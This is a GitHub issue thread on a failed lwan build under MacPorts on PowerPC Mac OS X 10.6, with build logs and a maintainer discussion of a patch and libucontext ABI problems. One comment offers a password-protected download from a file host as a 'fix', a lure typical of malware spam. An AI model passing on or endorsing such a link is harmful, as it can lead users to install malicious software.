CMakeFiles/configdump.dir/__/__/lib/hash.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c
[ 11%] Building C object src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/murmur3.c.o
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /opt/local/bin/gcc-mp-14 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -fstack-protector-explicit -Wduplicated-cond -Wduplicated-branches -Wlogical-op -Wrestrict -Wdouble-promotion -Wno-unused-parameter -Wstringop-truncation -Wvla -Wno-free-nonheap-object -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -mtune=native -falign-functions=32 -fno-semantic-interposition -fno-asynchronous-unwind-tables -flto=jobserver -ffat-lto-objects -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/murmur3.c.o -MF CMakeFiles/configdump.dir/__/__/lib/murmur3.c.o.d -o CMakeFiles/configdump.dir/__/__/lib/murmur3.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c
/opt/local/bin/ccache /opt/local/bin/gcc-mp-14 -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -fstack-protector-explicit -Wduplicated-cond -Wduplicated-branches -Wlogical-op -Wrestrict -Wdouble-promotion -Wno-unused-parameter -Wstringop-truncation -Wvla -Wno-free-nonheap-object -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -mtune=native -falign-functions=32 -fno-semantic-interposition -fno-asynchronous-unwind-tables -flto=jobserver -ffat-lto-objects -arch ppc -mmacosx-version-min=10.6 -Wl,-search_paths_first -Wl,-headerpad_max_install_names -Wl,-headerpad_max_install_names -L/opt/local/lib -lMacportsLegacySupport -Wl,-bind_at_load CMakeFiles/bin2hex.dir/bin2hex.c.o -o bin2hex  -Wl,-rpath,/opt/local/lib
[ 12%] Building C object src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/hash.c.o
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /opt/local/bin/gcc-mp-14 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -fstack-protector-explicit -Wduplicated-cond -Wduplicated-branches -Wlogical-op -Wrestrict -Wdouble-promotion -Wno-unused-parameter -Wstringop-truncation -Wvla -Wno-free-nonheap-object -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -mtune=native -falign-functions=32 -fno-semantic-interposition -fno-asynchronous-unwind-tables -flto=jobserver -ffat-lto-objects -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/hash.c.o -MF CMakeFiles/mimegen.dir/__/__/lib/hash.c.o.d -o CMakeFiles/mimegen.dir/__/__/lib/hash.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c
[ 13%] Building C object src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/missing.c.o
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /opt/local/bin/gcc-mp-14 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -fstack-protector-explicit -Wduplicated-cond -Wduplicated-branches -Wlogical-op -Wrestrict -Wdouble-promotion -Wno-unused-parameter -Wstringop-truncation -Wvla -Wno-free-nonheap-object -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -mtune=native -falign-functions=32 -fno-semantic-interposition -fno-asynchronous-unwind-tables -flto=jobserver -ffat-lto-objects -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/missing.c.o -MF CMakeFiles/configdump.dir/__/__/lib/missing.c.o.d -o CMakeFiles/configdump.dir/__/__/lib/missing.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c:169:1: error: constructor priorities are not supported
  169 | {
      | ^
make[2]: *** [src/bin/tools/CMakeFiles/configdump.dir/__/__/lib/hash.c.o] Error 1
make[2]: *** Waiting for unfinished jobs....
[ 15%] Building C object src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/murmur3.c.o
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /opt/local/bin/gcc-mp-14 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -fstack-protector-explicit -Wduplicated-cond -Wduplicated-branches -Wlogical-op -Wrestrict -Wdouble-promotion -Wno-unused-parameter -Wstringop-truncation -Wvla -Wno-free-nonheap-object -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -mtune=native -falign-functions=32 -fno-semantic-interposition -fno-asynchronous-unwind-tables -flto=jobserver -ffat-lto-objects -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/murmur3.c.o -MF CMakeFiles/mimegen.dir/__/__/lib/murmur3.c.o.d -o CMakeFiles/mimegen.dir/__/__/lib/murmur3.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/murmur3.c
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/hash.c:169:1: error: constructor priorities are not supported
  169 | {
      | ^
make[2]: *** [src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/hash.c.o] Error 1
make[2]: *** Waiting for unfinished jobs....
[ 16%] Building C object src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/missing.c.o
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/bin/tools && /opt/local/bin/ccache /opt/local/bin/ccache /opt/local/bin/gcc-mp-14 -D_FILE_OFFSET_BITS=64 -D_TIME_BITS=64 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing -I/opt/local/include/lua5.1 -I/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib -pipe -Os -DNDEBUG -isystem/opt/local/include/LegacySupport -I/opt/local/include -fstack-protector-explicit -Wduplicated-cond -Wduplicated-branches -Wlogical-op -Wrestrict -Wdouble-promotion -Wno-unused-parameter -Wstringop-truncation -Wvla -Wno-free-nonheap-object -Wall -Wextra -Wshadow -Wconversion -std=gnu99 -O3 -DNDEBUG  -mtune=native -falign-functions=32 -fno-semantic-interposition -fno-asynchronous-unwind-tables -flto=jobserver -ffat-lto-objects -arch ppc -mmacosx-version-min=10.6   -include /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/lwan-build-config.h -MD -MT src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/missing.c.o -MF CMakeFiles/mimegen.dir/__/__/lib/missing.c.o.d -o CMakeFiles/mimegen.dir/__/__/lib/missing.c.o -c /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c
make[2]: Leaving directory `/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build'
[ 16%] Built target bin2hex
/usr/bin/make  -f src/lib/CMakeFiles/generate_auto_index_icons.dir/build.make src/lib/CMakeFiles/generate_auto_index_icons.dir/depend
make[2]: Entering directory `/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build'
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build && /opt/local/bin/cmake -E cmake_depends "Unix Makefiles" /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3 /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/lib /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/lib/CMakeFiles/generate_auto_index_icons.dir/DependInfo.cmake "--color="
make[2]: Leaving directory `/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build'
/usr/bin/make  -f src/lib/CMakeFiles/generate_auto_index_icons.dir/build.make src/lib/CMakeFiles/generate_auto_index_icons.dir/build
make[2]: Entering directory `/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build'
[ 17%] Bundling auto-index icons
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/lib && ../bin/tools/bin2hex /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/wwwroot/icons/back.gif back_gif /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/wwwroot/icons/file.gif file_gif /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/wwwroot/icons/folder.gif folder_gif > /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/auto-index-icons.h
make[2]: Leaving directory `/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build'
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c: In function 'epoll_ctl':
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:173:9: warning: conversion to 'uintptr_t' {aka 'long unsigned int'} from 'int' may change the sign of the result [-Wsign-conversion]
  173 |         EV_SET(&ev, fd, events, flags, 0, 0, udata);
      |         ^~~~~~
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:173:9: warning: conversion from 'int' to 'int16_t' {aka 'short int'} may change value [-Wconversion]
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:173:9: warning: conversion from 'int' to 'uint16_t' {aka 'short unsigned int'} may change value [-Wconversion]
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:178:9: warning: conversion to 'uintptr_t' {aka 'long unsigned int'} from 'int' may change the sign of the result [-Wsign-conversion]
  178 |         EV_SET(&ev, fd, 0, EV_DELETE, 0, 0, 0);
      |         ^~~~~~
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c: In function 'epoll_wait':
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:203:12: warning: ISO C90 forbids variable length array 'evs' [-Wvla]
  203 |     struct kevent evs[maxevents];
      |            ^~~~~~
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c: In function 'rawmemchr':
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:470:51: warning: 'memchr' specified bound 4294967295 exceeds maximum object size 2147483647 [-Wstringop-overread]
  470 | void *rawmemchr(const void *ptr, char c) { return memchr(ptr, c, SIZE_MAX); }
      |                                                   ^~~~~~~~~~~~~~~~~~~~~~~~
make[2]: Leaving directory `/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build'
make[1]: *** [src/bin/tools/CMakeFiles/configdump.dir/all] Error 2
make[1]: *** Waiting for unfinished jobs....
[ 17%] Built target generate_auto_index_icons
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c: In function 'epoll_ctl':
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:173:9: warning: conversion to 'uintptr_t' {aka 'long unsigned int'} from 'int' may change the sign of the result [-Wsign-conversion]
  173 |         EV_SET(&ev, fd, events, flags, 0, 0, udata);
      |         ^~~~~~
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:173:9: warning: conversion from 'int' to 'int16_t' {aka 'short int'} may change value [-Wconversion]
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:173:9: warning: conversion from 'int' to 'uint16_t' {aka 'short unsigned int'} may change value [-Wconversion]
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:178:9: warning: conversion to 'uintptr_t' {aka 'long unsigned int'} from 'int' may change the sign of the result [-Wsign-conversion]
  178 |         EV_SET(&ev, fd, 0, EV_DELETE, 0, 0, 0);
      |         ^~~~~~
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c: In function 'epoll_wait':
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:203:12: warning: ISO C90 forbids variable length array 'evs' [-Wvla]
  203 |     struct kevent evs[maxevents];
      |            ^~~~~~
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c: In function 'rawmemchr':
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-0.3/src/lib/missing.c:470:51: warning: 'memchr' specified bound 4294967295 exceeds maximum object size 2147483647 [-Wstringop-overread]
  470 | void *rawmemchr(const void *ptr, char c) { return memchr(ptr, c, SIZE_MAX); }
      |                                                   ^~~~~~~~~~~~~~~~~~~~~~~~
make[2]: Leaving directory `/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build'
make[1]: *** [src/bin/tools/CMakeFiles/mimegen.dir/all] Error 2
make[1]: Leaving directory `/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build'
make: *** [all] Error 2
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by barracuda156** [comment]
Thank you for responding.

> (Also, yes, GCC 4.x is too old and I'm not going to support it, even with patches.)

This is no problem at all, since we have the modern GCC (and Clang on Intel) on every system from 10.4 up.
gcc-4.2 was picked initially, since the code does not ask for any specific C/C++ standard. But since it is expected to fail anyway, we can force using a newer gcc regardless.

**Comment by lpereira** [comment]
af47365ca should have a patch that probably fixes this issue. Eventually this should be fixed a bit better by implementing priorities ourselves, but for now this should be sufficient to unblock you. Please let me know if it works for you.

**Comment by barracuda156** [comment]
@lpereira Thank you for following up on this.

Is `libucontext` a new requirement? On 0.3 the patch did not apply, and building from master I get this:
```
cd /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-af47365cab2f638f6beabd0c70cd4beabb4e4dbf/src/3rdparty/libucontext && /opt/local/bin/cmake -E touch /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build/src/lib/libucontext-prefix/src/libucontext-stamp/libucontext-configure
In file included from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-af47365cab2f638f6beabd0c70cd4beabb4e4dbf/src/lib/lwan-array.h:27,
                 from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-af47365cab2f638f6beabd0c70cd4beabb4e4dbf/src/lib/lwan.h:36,
                 from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-af47365cab2f638f6beabd0c70cd4beabb4e4dbf/src/lib/missing.c:35:
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-af47365cab2f638f6beabd0c70cd4beabb4e4dbf/src/lib/lwan-coro.h:32:10: fatal error: libucontext/libucontext.h: No such file or directory
   32 | #include <libucontext/libucontext.h>
      |          ^~~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
In file included from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-af47365cab2f638f6beabd0c70cd4beabb4e4dbf/src/lib/lwan-array.h:27,
                 from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-af47365cab2f638f6beabd0c70cd4beabb4e4dbf/src/lib/lwan.h:36,
                 from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-af47365cab2f638f6beabd0c70cd4beabb4e4dbf/src/lib/lwan-private.h:25,
                 from /opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-af47365cab2f638f6beabd0c70cd4beabb4e4dbf/src/lib/lwan-status.c:31:
/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/lwan-af47365cab2f638f6beabd0c70cd4beabb4e4dbf/src/lib/lwan-coro.h:32:10: fatal error: libucontext/libucontext.h: No such file or directory
   32 | #include <libucontext/libucontext.h>
      |          ^~~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
make[2]: *** [src/bin/tools/CMakeFiles/mimegen.dir/__/__/lib/missing.c.o] Error 1
make[2]: Leaving directory `/opt/local/var/macports/build/_opt_PPCSnowLeopardPorts_www_lwan/lwan/work/build'
make[1]: *** [src/bin/tools/CMakeFiles/mimegen.dir/all] Error 2
```

Looks like `libucontext` is not there in MacPorts, but I can try making a port for it. No idea if it supports macOS though: it refers to glibc in README.

**Comment by barracuda156** [comment]
UPD. Well, no, `libucontext` is completely broken, and looks like needs assembler to be fixed, as the very minimum.

**Comment by lpereira** [comment]
Try "make libucontext lwan" or something of the sort. The build dependencies seem to be broken, and this should help at least get the includes/libraries right. If the PPC assembly version isn't working, we'll need to open a upstream report with libucontext.

**Comment by barracuda156** [comment]
@ It uses ELF ABI unconditionally here: https://github.com/lpereira/lwan/tree/master/src/3rdparty/libucontext/arch/ppc
That will not work: https://github.com/kaniini/libucontext/issues/65

It should be fixable, but not something I can do in a few minutes. (It is not just registers defs are incompatible; ucontext functions should be changed, assembler opcodes fixed, and I do not know if it will work in result – obviously, this was never tested outside of Linux and maybe some BSD.)

Won't something like Boost `libcontext` possibly work?

**Comment by barracuda156** [comment]
P. S. I understand that `libucontext` bugs are completely unrelated to this issue, this is just to explain why I cannot test the build straighaway now.

**Comment by lpereira** [comment]
Ahhh, it's an ABI issue. Yeah, I imagine `libucontext` has been primarily tested on ELF systems. I know nothing about PPC and I don't have one any longer, so I can't help you there.

On the other hand, I just pushed a fix that should get the build dependencies correct when using `ninja` and `libucontext`.

**Comment by lpereira** [comment]
Reported issue has been fixed, so closing this issue.  The remaining issue (PPC on non-ELF systems) requires expertise, time, and access to machines I don't have, so unless someone steps up to improve libucontext, Lwan won't work on those systems.

**Comment by barracuda156** [comment]
> Reported issue has been fixed, so closing this issue. The remaining issue (PPC on non-ELF systems) requires expertise, time, and access to machines I don't have, so unless someone steps up to improve libucontext, Lwan won't work on those systems.

@lpereira If you could reply to a couple of technical questions on its ELF ABI, I may be able to fix it for Darwin. Unfortunately, upstream just ignored it: https://github.com/kaniini/libucontext/issues/65#issuecomment-2315205141
I need at least to figure out how its definitions correspond to hardware registers here: https://github.com/kaniini/libucontext/blob/a0323579ac50b9a9d4033754d089f1fed0f59a00/arch/ppc/defs.h (because it uses non-standard naming).
